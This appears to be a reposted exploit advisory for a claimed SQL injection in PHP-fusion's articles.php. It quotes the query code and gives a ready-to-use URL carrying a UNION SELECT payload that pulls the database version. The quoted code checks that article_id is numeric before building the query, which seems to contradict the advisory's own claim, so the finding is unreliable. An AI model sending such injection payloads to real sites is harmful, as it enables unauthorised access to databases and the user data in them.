# Title : PHP-fusion (articles.php) SQL Injection Exploit
# platform : php
# Impact : Remote SQL Injection |
# Tested on : Windows XP sp3
if (isset($_GET['article_id']) && isnum($_GET['article_id'])) {
$result = dbquery(
"SELECT ta.article_subject, ta.article_article, ta.article_breaks,
ta.article_datestamp, ta.article_reads, ta.article_allow_comments, ta.article_allow_ratings,
tac.article_cat_id, tac.article_cat_name,
tu.user_id, tu.user_name, tu.user_status
FROM ".DB_ARTICLES." ta
INNER JOIN ".DB_ARTICLE_CATS." tac ON ta.article_cat=tac.article_cat_id
LEFT JOIN ".DB_USERS." tu ON ta.article_name=tu.user_id
WHERE ".groupaccess('article_cat_access')." AND article_id='".$_GET['article_id']."' AND article_draft='0'"
);
# Exploit :
http://[localhost]/[Path]/articles.php?article_id=-1+union+select+version()--
0 nhận xét:
Đăng nhận xét